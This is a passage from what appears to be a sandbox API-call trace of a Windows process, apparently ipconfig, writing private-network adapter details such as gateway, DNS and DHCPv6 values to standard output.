	[0218.670] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x432a40 | out: hHeap=0x400000) returned 1
	[0218.670] LocalFree (hMem=0x436af8) returned 0x0
	[0218.670] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x21fba0 | out: lpSystemTimeAsFileTime=0x21fba0*(dwLowDateTime=0x6a7a3a40, dwHighDateTime=0x1d50a6a)) 
	[0218.670] FileTimeToLocalFileTime (in: lpFileTime=0x21fba0, lpLocalFileTime=0x21fb78 | out: lpLocalFileTime=0x21fb78) returned 1
	[0218.670] FileTimeToSystemTime (in: lpFileTime=0x21fb78, lpSystemTime=0x21fb68 | out: lpSystemTime=0x21fb68) returned 1
	[0218.670] GetDateFormatW (in: Locale=0x400, dwFlags=0x2, lpDate=0x21fb68, lpFormat=0x0, lpDateStr=0x21fbcc, cchDate=128 | out: lpDateStr="Tuesday, May 14, 2019") returned 22
	[0218.671] GetTimeFormatW (in: Locale=0x400, dwFlags=0x0, lpTime=0x21fb68, lpFormat=0x0, lpTimeStr=0x21fbf8, cchTime=106 | out: lpTimeStr="4:30:30 PM") returned 11
	[0218.671] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x27a7, dwLanguageId=0x0, lpBuffer=0x21fb80, nSize=0x0, Arguments=0x21fb7c | out: lpBuffer="\x6af8\x43\xfd7c\x21\x2312\xa3\x27a7") returned 0x49
	[0218.671] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.671] GetFileType (hFile=0x150) returned 0x3
	[0218.671] GetProcessHeap () returned 0x400000
	[0218.671] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x92) returned 0x432a40
	[0218.671] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Lease Expires . . . . . . . . . . : Tuesday, May 14, 2019 4:30:30 PM\r\n", cchWideChar=73, lpMultiByteStr=0x432a40, cbMultiByte=146, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Lease Expires . . . . . . . . . . : Tuesday, May 14, 2019 4:30:30 PM\r\nrred) \r\n", lpUsedDefaultChar=0x0) returned 73
	[0218.671] WriteFile (in: hFile=0x150, lpBuffer=0x432a40*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x21fb64, lpOverlapped=0x0 | out: lpBuffer=0x432a40*, lpNumberOfBytesWritten=0x21fb64*=0x49, lpOverlapped=0x0) returned 1
	[0218.671] GetProcessHeap () returned 0x400000
	[0218.671] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x432a40 | out: hHeap=0x400000) returned 1
	[0218.671] LocalFree (hMem=0x436af8) returned 0x0
	[0218.671] RtlIpv4AddressToStringExW () returned 0x0
	[0218.671] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x278d, dwLanguageId=0x0, lpBuffer=0x21fb80, nSize=0x0, Arguments=0x21fb7c | out: lpBuffer="\x6af8\x43\xfd7c\x21\x1be4\xa3\x278d") returned 0x34
	[0218.671] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.671] GetFileType (hFile=0x150) returned 0x3
	[0218.671] GetProcessHeap () returned 0x400000
	[0218.671] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x68) returned 0x432a40
	[0218.671] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Default Gateway . . . . . . . . . : 192.168.0.1\r\n", cchWideChar=52, lpMultiByteStr=0x432a40, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Default Gateway . . . . . . . . . : 192.168.0.1\r\n14, 2019 4:30:30 PM\r\nrred) \r\n", lpUsedDefaultChar=0x0) returned 52
	[0218.671] WriteFile (in: hFile=0x150, lpBuffer=0x432a40*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x21fb64, lpOverlapped=0x0 | out: lpBuffer=0x432a40*, lpNumberOfBytesWritten=0x21fb64*=0x34, lpOverlapped=0x0) returned 1
	[0218.671] GetProcessHeap () returned 0x400000
	[0218.671] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x432a40 | out: hHeap=0x400000) returned 1
	[0218.671] LocalFree (hMem=0x436af8) returned 0x0
	[0218.671] ConvertInterfaceLuidToGuid (in: InterfaceLuid=0x43f790, InterfaceGuid=0x21f924 | out: InterfaceGuid=0x21f924*(Data1=0xd303b40d, Data2=0xcbb0, Data3=0x4cd4, Data4=([0]=0x93, [1]=0x3a, [2]=0x6, [3]=0x97, [4]=0xf0, [5]=0x6e, [6]=0xa7, [7]=0xc1))) returned 0x0
	[0218.671] ConvertGuidToStringW () returned 0x0
	[0218.671] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip6\\Parameters\\Interfaces\\{D303B40D-CBB0-4CD4-933A-0697F06EA7C1}", ulOptions=0x0, samDesired=0x20019, phkResult=0x21f91c | out: phkResult=0x21f91c*=0x184) returned 0x0
	[0218.671] RegQueryValueExW (in: hKey=0x184, lpValueName="Dhcpv6ClassId", lpReserved=0x0, lpType=0x21f918, lpData=0x21f934, lpcbData=0x21f920*=0x200 | out: lpType=0x21f918*=0x0, lpData=0x21f934*=0x1, lpcbData=0x21f920*=0x200) returned 0x2
	[0218.671] ConvertInterfaceLuidToGuid (in: InterfaceLuid=0x43f790, InterfaceGuid=0x21f924 | out: InterfaceGuid=0x21f924*(Data1=0xd303b40d, Data2=0xcbb0, Data3=0x4cd4, Data4=([0]=0x93, [1]=0x3a, [2]=0x6, [3]=0x97, [4]=0xf0, [5]=0x6e, [6]=0xa7, [7]=0xc1))) returned 0x0
	[0218.671] ConvertGuidToStringW () returned 0x0
	[0218.671] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{D303B40D-CBB0-4CD4-933A-0697F06EA7C1}", ulOptions=0x0, samDesired=0x20019, phkResult=0x21f91c | out: phkResult=0x21f91c*=0x190) returned 0x0
	[0218.672] RegQueryValueExW (in: hKey=0x190, lpValueName="DhcpClassId", lpReserved=0x0, lpType=0x21f918, lpData=0x21f934, lpcbData=0x21f920*=0x200 | out: lpType=0x21f918*=0x0, lpData=0x21f934*=0x1, lpcbData=0x21f920*=0x200) returned 0x2
	[0218.672] RtlIpv4AddressToStringExW () returned 0x0
	[0218.672] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x278f, dwLanguageId=0x0, lpBuffer=0x21fb80, nSize=0x0, Arguments=0x21fb7c | out: lpBuffer="\x6af8\x43\xfd7c\x21\x1d6f\xa3\x278f") returned 0x34
	[0218.672] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.672] GetFileType (hFile=0x150) returned 0x3
	[0218.672] GetProcessHeap () returned 0x400000
	[0218.672] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x68) returned 0x437cc0
	[0218.672] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   DHCP Server . . . . . . . . . . . : 192.168.0.1\r\n", cchWideChar=52, lpMultiByteStr=0x437cc0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   DHCP Server . . . . . . . . . . . : 192.168.0.1\r\n", lpUsedDefaultChar=0x0) returned 52
	[0218.672] WriteFile (in: hFile=0x150, lpBuffer=0x437cc0*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x21fb64, lpOverlapped=0x0 | out: lpBuffer=0x437cc0*, lpNumberOfBytesWritten=0x21fb64*=0x34, lpOverlapped=0x0) returned 1
	[0218.672] GetProcessHeap () returned 0x400000
	[0218.672] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x437cc0 | out: hHeap=0x400000) returned 1
	[0218.672] LocalFree (hMem=0x436af8) returned 0x0
	[0218.672] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2a31, dwLanguageId=0x0, lpBuffer=0x21fb80, nSize=0x0, Arguments=0x21fb7c | out: lpBuffer="\x6af8\x43\xfd7c\x21\x1d94\xa3\x2a31") returned 0x32
	[0218.672] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.672] GetFileType (hFile=0x150) returned 0x3
	[0218.672] GetProcessHeap () returned 0x400000
	[0218.672] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x64) returned 0x437cc0
	[0218.672] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   DHCPv6 IAID . . . . . . . . . . . : 234938623\r\n", cchWideChar=50, lpMultiByteStr=0x437cc0, cbMultiByte=100, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   DHCPv6 IAID . . . . . . . . . . . : 234938623\r\n\r\n", lpUsedDefaultChar=0x0) returned 50
	[0218.672] WriteFile (in: hFile=0x150, lpBuffer=0x437cc0*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x21fb64, lpOverlapped=0x0 | out: lpBuffer=0x437cc0*, lpNumberOfBytesWritten=0x21fb64*=0x32, lpOverlapped=0x0) returned 1
	[0218.672] GetProcessHeap () returned 0x400000
	[0218.672] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x437cc0 | out: hHeap=0x400000) returned 1
	[0218.672] LocalFree (hMem=0x436af8) returned 0x0
	[0218.672] GetProcessHeap () returned 0x400000
	[0218.672] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x54) returned 0x430ba8
	[0218.672] _vsnwprintf (in: _Buffer=0x430ba8, _BufferCount=0x29, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="00-") returned 3
	[0218.672] _vsnwprintf (in: _Buffer=0x430bae, _BufferCount=0x26, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="01-") returned 3
	[0218.672] _vsnwprintf (in: _Buffer=0x430bb4, _BufferCount=0x23, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="00-") returned 3
	[0218.672] _vsnwprintf (in: _Buffer=0x430bba, _BufferCount=0x20, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="01-") returned 3
	[0218.672] _vsnwprintf (in: _Buffer=0x430bc0, _BufferCount=0x1d, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="21-") returned 3
	[0218.672] _vsnwprintf (in: _Buffer=0x430bc6, _BufferCount=0x1a, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="7A-") returned 3
	[0218.672] _vsnwprintf (in: _Buffer=0x430bcc, _BufferCount=0x17, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="B4-") returned 3
	[0218.672] _vsnwprintf (in: _Buffer=0x430bd2, _BufferCount=0x14, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="D4-") returned 3
	[0218.672] _vsnwprintf (in: _Buffer=0x430bd8, _BufferCount=0x11, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="00-") returned 3
	[0218.672] _vsnwprintf (in: _Buffer=0x430bde, _BufferCount=0xe, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="E0-") returned 3
	[0218.672] _vsnwprintf (in: _Buffer=0x430be4, _BufferCount=0xb, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="FF-") returned 3
	[0218.672] _vsnwprintf (in: _Buffer=0x430bea, _BufferCount=0x8, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="8A-") returned 3
	[0218.673] _vsnwprintf (in: _Buffer=0x430bf0, _BufferCount=0x5, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="6A-") returned 3
	[0218.673] _vsnwprintf (in: _Buffer=0x430bf6, _BufferCount=0x2, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="663") returned -1
	[0218.673] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2a30, dwLanguageId=0x0, lpBuffer=0x21fb80, nSize=0x0, Arguments=0x21fb7c | out: lpBuffer="\x6af8\x43\xfd7c\x21\x2e3f\xa3\x2a30") returned 0x52
	[0218.673] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.673] GetFileType (hFile=0x150) returned 0x3
	[0218.673] GetProcessHeap () returned 0x400000
	[0218.673] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0xa4) returned 0x432a40
	[0218.673] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-21-7A-B4-D4-00-E0-FF-8A-6A-66\r\n", cchWideChar=82, lpMultiByteStr=0x432a40, cbMultiByte=164, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-21-7A-B4-D4-00-E0-FF-8A-6A-66\r\n", lpUsedDefaultChar=0x0) returned 82
	[0218.673] WriteFile (in: hFile=0x150, lpBuffer=0x432a40*, nNumberOfBytesToWrite=0x52, lpNumberOfBytesWritten=0x21fb64, lpOverlapped=0x0 | out: lpBuffer=0x432a40*, lpNumberOfBytesWritten=0x21fb64*=0x52, lpOverlapped=0x0) returned 1
	[0218.673] GetProcessHeap () returned 0x400000
	[0218.673] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x432a40 | out: hHeap=0x400000) returned 1
	[0218.673] LocalFree (hMem=0x436af8) returned 0x0
	[0218.673] GetProcessHeap () returned 0x400000
	[0218.673] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x430ba8 | out: hHeap=0x400000) returned 1
	[0218.673] RtlIpv4AddressToStringExW () returned 0x0
	[0218.673] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2790, dwLanguageId=0x0, lpBuffer=0x21fb80, nSize=0x0, Arguments=0x21fb7c | out: lpBuffer="\x6af8\x43\xfd7c\x21\x1dfa\xa3\x2790") returned 0x34
	[0218.673] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.673] GetFileType (hFile=0x150) returned 0x3
	[0218.673] GetProcessHeap () returned 0x400000
	[0218.673] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x68) returned 0x437cc0
	[0218.673] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   DNS Servers . . . . . . . . . . . : 192.168.0.1\r\n", cchWideChar=52, lpMultiByteStr=0x437cc0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   DNS Servers . . . . . . . . . . . : 192.168.0.1\r\n", lpUsedDefaultChar=0x0) returned 52
	[0218.673] WriteFile (in: hFile=0x150, lpBuffer=0x437cc0*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x21fb64, lpOverlapped=0x0 | out: lpBuffer=0x437cc0*, lpNumberOfBytesWritten=0x21fb64*=0x34, lpOverlapped=0x0) returned 1
	[0218.673] GetProcessHeap () returned 0x400000
	[0218.673] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x437cc0 | out: hHeap=0x400000) returned 1
	[0218.673] LocalFree (hMem=0x436af8) returned 0x0
	[0218.673] ConvertInterfaceLuidToGuid (in: InterfaceLuid=0x43f790, InterfaceGuid=0x21fbbc | out: InterfaceGuid=0x21fbbc*(Data1=0xd303b40d, Data2=0xcbb0, Data3=0x4cd4, Data4=([0]=0x93, [1]=0x3a, [2]=0x6, [3]=0x97, [4]=0xf0, [5]=0x6e, [6]=0xa7, [7]=0xc1))) returned 0x0
	[0218.673] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x279d, dwLanguageId=0x0, lpBuffer=0x21fb84, nSize=0x0, Arguments=0x21fb80 | out: lpBuffer="\x6af8\x43\xfd7c\x21\x1cf3\xa3\x279d") returned 0x30
	[0218.673] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.673] GetFileType (hFile=0x150) returned 0x3
	[0218.673] GetProcessHeap () returned 0x400000
	[0218.673] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x60) returned 0x4350e0
	[0218.673] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   NetBIOS over Tcpip. . . . . . . . : Enabled\r\n", cchWideChar=48, lpMultiByteStr=0x4350e0, cbMultiByte=96, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   NetBIOS over Tcpip. . . . . . . . : Enabled\r\nl", lpUsedDefaultChar=0x0) returned 48
	[0218.673] WriteFile (in: hFile=0x150, lpBuffer=0x4350e0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x21fb68, lpOverlapped=0x0 | out: lpBuffer=0x4350e0*, lpNumberOfBytesWritten=0x21fb68*=0x30, lpOverlapped=0x0) returned 1
	[0218.674] GetProcessHeap () returned 0x400000
	[0218.674] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4350e0 | out: hHeap=0x400000) returned 1
	[0218.674] LocalFree (hMem=0x436af8) returned 0x0
	[0218.674] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275e, dwLanguageId=0x0, lpBuffer=0x21fb80, nSize=0x0, Arguments=0x21fb7c | out: lpBuffer="\x6af8\x43\xfd7c\x21\x1a89\xa3\x275e") returned 0x43
	[0218.674] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.674] GetFileType (hFile=0x150) returned 0x3
	[0218.674] GetProcessHeap () returned 0x400000
	[0218.674] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x86) returned 0x432a40
	[0218.674] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nTunnel adapter isatap.{D303B40D-CBB0-4CD4-933A-0697F06EA7C1}:\r\n\r\n", cchWideChar=67, lpMultiByteStr=0x432a40, cbMultiByte=134, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nTunnel adapter isatap.{D303B40D-CBB0-4CD4-933A-0697F06EA7C1}:\r\n\r\n0-FF-8A-6A-66\r\n", lpUsedDefaultChar=0x0) returned 67
	[0218.674] WriteFile (in: hFile=0x150, lpBuffer=0x432a40*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x21fb64, lpOverlapped=0x0 | out: lpBuffer=0x432a40*, lpNumberOfBytesWritten=0x21fb64*=0x43, lpOverlapped=0x0) returned 1
	[0218.674] GetProcessHeap () returned 0x400000
	[0218.674] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x432a40 | out: hHeap=0x400000) returned 1
	[0218.674] LocalFree (hMem=0x436af8) returned 0x0
	[0218.674] ConvertInterfaceIndexToLuid (in: InterfaceIndex=0xc, InterfaceLuid=0x21fb80 | out: InterfaceLuid=0x21fb80) returned 0x0
	[0218.674] NsiGetAllParameters () returned 0x0
	[0218.674] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2774, dwLanguageId=0x0, lpBuffer=0x21fa94, nSize=0x0, Arguments=0x21fa90 | out: lpBuffer="\x6af8\x43\xfb88\x21\x503d\xa3\x2774") returned 0x3b
	[0218.674] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.674] GetFileType (hFile=0x150) returned 0x3
	[0218.674] GetProcessHeap () returned 0x400000
	[0218.674] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x76) returned 0x40ee90
	[0218.674] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Media State . . . . . . . . . . . : Media disconnected\r\n", cchWideChar=59, lpMultiByteStr=0x40ee90, cbMultiByte=118, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Media State . . . . . . . . . . . : Media disconnected\r\n", lpUsedDefaultChar=0x0) returned 59
	[0218.674] WriteFile (in: hFile=0x150, lpBuffer=0x40ee90*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x21fa78, lpOverlapped=0x0 | out: lpBuffer=0x40ee90*, lpNumberOfBytesWritten=0x21fa78*=0x3b, lpOverlapped=0x0) returned 1
	[0218.674] GetProcessHeap () returned 0x400000
	[0218.674] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x40ee90 | out: hHeap=0x400000) returned 1
	[0218.674] LocalFree (hMem=0x436af8) returned 0x0
	[0218.674] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x277e, dwLanguageId=0x0, lpBuffer=0x21fb80, nSize=0x0, Arguments=0x21fb7c | out: lpBuffer="\x6af8\x43\xfd7c\x21\x1aa2\xa3\x277e") returned 0x29
	[0218.674] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.674] GetFileType (hFile=0x150) returned 0x3
	[0218.674] GetProcessHeap () returned 0x400000
	[0218.674] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x52) returned 0x430ba8
	[0218.675] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Connection-specific DNS Suffix  . : \r\n", cchWideChar=41, lpMultiByteStr=0x430ba8, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Connection-specific DNS Suffix  . : \r\n", lpUsedDefaultChar=0x0) returned 41
	[0218.675] WriteFile (in: hFile=0x150, lpBuffer=0x430ba8*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x21fb64, lpOverlapped=0x0 | out: lpBuffer=0x430ba8*, lpNumberOfBytesWritten=0x21fb64*=0x29, lpOverlapped=0x0) returned 1
	[0218.675] GetProcessHeap () returned 0x400000
	[0218.675] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x430ba8 | out: hHeap=0x400000) returned 1
	[0218.675] LocalFree (hMem=0x436af8) returned 0x0
	[0218.675] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x277f, dwLanguageId=0x0, lpBuffer=0x21fb80, nSize=0x0, Arguments=0x21fb7c | out: lpBuffer="\x6af8\x43\xfd7c\x21\x1aba\xa3\x277f") returned 0x41
	[0218.675] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.675] GetFileType (hFile=0x150) returned 0x3
	[0218.675] GetProcessHeap () returned 0x400000
	[0218.675] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x82) returned 0x432a40
	[0218.675] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Description . . . . . . . . . . . : Microsoft ISATAP Adapter\r\n", cchWideChar=65, lpMultiByteStr=0x432a40, cbMultiByte=130, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Description . . . . . . . . . . . : Microsoft ISATAP Adapter\r\n\r\n0-FF-8A-6A-66\r\n", lpUsedDefaultChar=0x0) returned 65
	[0218.675] WriteFile (in: hFile=0x150, lpBuffer=0x432a40*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x21fb64, lpOverlapped=0x0 | out: lpBuffer=0x432a40*, lpNumberOfBytesWritten=0x21fb64*=0x41, lpOverlapped=0x0) returned 1
	[0218.675] GetProcessHeap () returned 0x400000
	[0218.675] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x432a40 | out: hHeap=0x400000) returned 1
	[0218.675] LocalFree (hMem=0x436af8) returned 0x0
	[0218.675] _vsnwprintf (in: _Buffer=0x21fcf4, _BufferCount=0x40, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="00-") returned 3
	[0218.675] _vsnwprintf (in: _Buffer=0x21fcfa, _BufferCount=0x3a, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="00-") returned 3
	[0218.675] _vsnwprintf (in: _Buffer=0x21fd00, _BufferCount=0x34, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="00-") returned 3
	[0218.675] _vsnwprintf (in: _Buffer=0x21fd06, _BufferCount=0x2e, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="00-") returned 3
	[0218.675] _vsnwprintf (in: _Buffer=0x21fd0c, _BufferCount=0x28, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="00-") returned 3
	[0218.675] _vsnwprintf (in: _Buffer=0x21fd12, _BufferCount=0x22, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="00-") returned 3
	[0218.675] _vsnwprintf (in: _Buffer=0x21fd18, _BufferCount=0x1c, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="00-") returned 3
	[0218.675] _vsnwprintf (in: _Buffer=0x21fd1e, _BufferCount=0x16, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="E0-") returned 3
	[0218.675] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2780, dwLanguageId=0x0, lpBuffer=0x21fb80, nSize=0x0, Arguments=0x21fb7c | out: lpBuffer="\x6af8\x43\xfd7c\x21\x1a09\xa3\x2780") returned 0x40
	[0218.675] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.675] GetFileType (hFile=0x150) returned 0x3
	[0218.675] GetProcessHeap () returned 0x400000
	[0218.675] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x80) returned 0x432a40
	[0218.675] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0\r\n", cchWideChar=64, lpMultiByteStr=0x432a40, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0\r\n\n\r\n0-FF-8A-6A-66\r\n", lpUsedDefaultChar=0x0) returned 64
	[0218.675] WriteFile (in: hFile=0x150, lpBuffer=0x432a40*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x21fb64, lpOverlapped=0x0 | out: lpBuffer=0x432a40*, lpNumberOfBytesWritten=0x21fb64*=0x40, lpOverlapped=0x0) returned 1
	[0218.675] GetProcessHeap () returned 0x400000
	[0218.675] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x432a40 | out: hHeap=0x400000) returned 1
	[0218.675] LocalFree (hMem=0x436af8) returned 0x0
	[0218.675] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2781, dwLanguageId=0x0, lpBuffer=0x21fb84, nSize=0x0, Arguments=0x21fb80 | out: lpBuffer="\x6af8\x43\xfd7c\x21\x1a1f\xa3\x2781") returned 0x2b
	[0218.675] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.675] GetFileType (hFile=0x150) returned 0x3
	[0218.675] GetProcessHeap () returned 0x400000
	[0218.675] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x56) returned 0x430ba8
	[0218.676] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   DHCP Enabled. . . . . . . . . . . : No\r\n", cchWideChar=43, lpMultiByteStr=0x430ba8, cbMultiByte=86, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   DHCP Enabled. . . . . . . . . . . : No\r\n", lpUsedDefaultChar=0x0) returned 43
	[0218.676] WriteFile (in: hFile=0x150, lpBuffer=0x430ba8*, nNumberOfBytesToWrite=0x2b, lpNumberOfBytesWritten=0x21fb68, lpOverlapped=0x0 | out: lpBuffer=0x430ba8*, lpNumberOfBytesWritten=0x21fb68*=0x2b, lpOverlapped=0x0) returned 1
	[0218.676] GetProcessHeap () returned 0x400000
	[0218.676] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x430ba8 | out: hHeap=0x400000) returned 1
	[0218.676] LocalFree (hMem=0x436af8) returned 0x0
	[0218.676] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2789, dwLanguageId=0x0, lpBuffer=0x21fb84, nSize=0x0, Arguments=0x21fb80 | out: lpBuffer="\x6af8\x43\xfd7c\x21\x1a2a\xa3\x2789") returned 0x2c
	[0218.676] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.676] GetFileType (hFile=0x150) returned 0x3
	[0218.676] GetProcessHeap () returned 0x400000
	[0218.676] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x58) returned 0x430ba8
	[0218.676] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Autoconfiguration Enabled . . . . : Yes\r\n", cchWideChar=44, lpMultiByteStr=0x430ba8, cbMultiByte=88, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Autoconfiguration Enabled . . . . : Yes\r\n4", lpUsedDefaultChar=0x0) returned 44
	[0218.676] WriteFile (in: hFile=0x150, lpBuffer=0x430ba8*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x21fb68, lpOverlapped=0x0 | out: lpBuffer=0x430ba8*, lpNumberOfBytesWritten=0x21fb68*=0x2c, lpOverlapped=0x0) returned 1
	[0218.676] GetProcessHeap () returned 0x400000
	[0218.676] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x430ba8 | out: hHeap=0x400000) returned 1
	[0218.676] LocalFree (hMem=0x436af8) returned 0x0
	[0218.676] LocalFree (hMem=0x43f6e0) returned 0x0
	[0218.676] IUnknown:Release (This=0x41873c) returned 0x0
	[0218.676] CoUninitialize () 
	[0218.680] exit (_Code=0) 

Thread:
	id = 264
